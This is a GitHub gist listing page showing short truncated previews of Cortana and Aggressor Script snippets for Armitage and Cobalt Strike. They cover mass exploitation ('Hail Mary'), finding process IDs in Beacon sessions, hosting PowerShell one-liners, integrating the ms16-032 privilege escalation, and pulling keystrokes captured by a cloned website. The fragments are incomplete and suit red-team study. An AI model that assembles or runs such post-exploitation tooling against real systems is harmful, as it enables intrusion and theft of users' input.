Skip to content

Instantly share code, notes, and snippets.


Raphael rsmudge

View GitHub Profile
rsmudge / gist:6717127
Created September 26, 2013 17:02
Cortana Find Attacks / Hail Mary Samples (taken out of context, not tested in production, used for testing in a stripped down Armitage)
View gist:6717127
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
sub exploitPorts {
local('$exploit %exploits $options $port');
foreach $exploit (modules("exploits")) {
$options = options("exploit", $exploit);
if ('RPORT' in $options) {
rsmudge / gist:6717164
Created September 26, 2013 17:04
Cortana Hail Mary / Find Attacks Example (taken from my development testing... not tested recently. This code was used in a highly stripped down version of Armitage)
View gist:6717164
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
popup attacks {
item "&Find Attacks" {
item "&Hail Mary" {
rsmudge / irc.cna
Created February 19, 2016 16:24
Aggressor Script IRC Example
View irc.cna
# Quick/Dirty IRC Library for use with Aggressor Script
# irc_close($handle);
sub irc_close {
println($1, "QUIT :Good bye!");
View getexplorer.cna
# getexplorerpid($bid, &callback);
sub getexplorerpid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq "explorer.exe") {
# $1 is our Beacon ID, $pid is the PID of explorer.exe
[$callback: $1, $pid];
rsmudge / getenv.cna
Last active December 11, 2019 19:45
View getenv.cna
# Aggressor Script means to parse/use environment vars in a Beacon session.
# request environment variables for every new Beacon that comes in.
on beacon_initial {
# ideally, we'd have a bshell that could take callbacks. We don't have
# this yet. Eventually though, we will.
rsmudge / getpidany.cna
Created May 2, 2016 16:30
Get PID of Any Process
View getpidany.cna
# getexplorerpid($bid, &callback);
sub getanypid {
bps($1, lambda({
local('$pid $name $entry');
foreach $entry (split("\n", $2)) {
($name, $pid) = split("\\s+", $entry);
if ($name eq $proc) {
# $1 is our Beacon ID, $pid is the PID of $proc
[$callback: $1, $proc, $pid];
rsmudge / bot.cna
Created June 15, 2016 15:38
Demonstration inversion-of-control using co-routines in Aggressor Script.
View bot.cna
# demonstrate an example of inversion-of-control with Aggressor Script
# co-routine,
sub bot {
# run pwd and get the output.
when("beacon_output_alt", $this);
rsmudge / oneliner.cna
Created July 7, 2016 21:07
How to host a large script via Beacon and grab it with a one-liner that connects to localhost.
View oneliner.cna
# host a PowerShell script on a one-off web server via Beacon.
# Why? Generate one-liners for length constrained command execution opportunities
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;
rsmudge / ms16-032.cna
Created July 29, 2016 04:11
Quick and dirty script to integrate ms16-032 into Cobalt Strike and its workflows.
View ms16-032.cna
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
# 1. grab MS16-032.ps1
# 2. store it with this script
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack
# logic to run this particular attack
sub exploit {
rsmudge / webkeystrokes.cna
Created August 10, 2016 19:44
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
@temp = split(",", $1);
return join("", map({
return chr(parseNumber($1, 16, 10));
}, @temp));